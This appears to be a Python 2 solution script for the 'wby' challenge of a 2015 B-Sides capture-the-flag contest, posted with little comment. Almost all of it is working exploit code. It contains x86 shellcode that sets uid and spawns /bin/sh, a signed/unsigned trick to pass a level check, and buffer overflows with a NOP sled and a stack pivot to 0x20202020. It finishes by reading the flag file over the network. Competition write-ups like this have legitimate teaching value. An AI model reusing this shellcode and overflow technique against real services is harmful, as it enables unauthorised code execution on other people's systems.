b-side ctf 2015 - wby

from lsm import * host = "wildblue.termsec.net" port = 2323 #host = "192.168.0.13" #port = 9998 shellcode ="\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" s = Connect(host,port) read_until(s, "thee?") # name s.send("aaa\n") read_until(s, "choice?") # choice s.send("1\n") read_until(s, "[1-3]:") # select level s.send("179\n") # unsigned value 179, signed value -77 payload1 = '' payload1 += "A"*32 # using for bypass of 'input_value <= 1f' payload1 += p(0x20202028) # 0x20202020 payload1 += "\x90"*64 # 0x20202024~~ payload1 += shellcode payload1 += "A\n" for i in range(0, 179): if (i!=178): read_until(s, ':') s.send("AAAA\n") elif (i==178): read_until(s, ":") s.send(payload1) sleep(1) read_until(s, "choice?") s.send("3\n") payload2 = '' payload2 += "A"*48 payload2 += p(0x20202024) # lea esp, [ecx-4] payload2 += 'BBBB' # mov ecx, [ebp-4] payload2 += "A\n" # This 'A' will be set zero # result, esp = 0x20202020 read_until(s, "thee?") s.send(payload2) read_until(s, "choice?") s.send("4\n") sleep(1) """ while 1: tmp = raw_input("$ ") if len(tmp): s.send(tmp+"\n") else: continue print s.recv(4096) """ s.send("cat flag.txt\n") print s.recv(1024) #flag{k1ck_in_tha_d00r_wavin_tha_44}

wby-23859086c3e87a4beb04b4f920b7ed49d407326e

wby-23859086c3e87a4beb04b4f920b7ed49d407326e.idb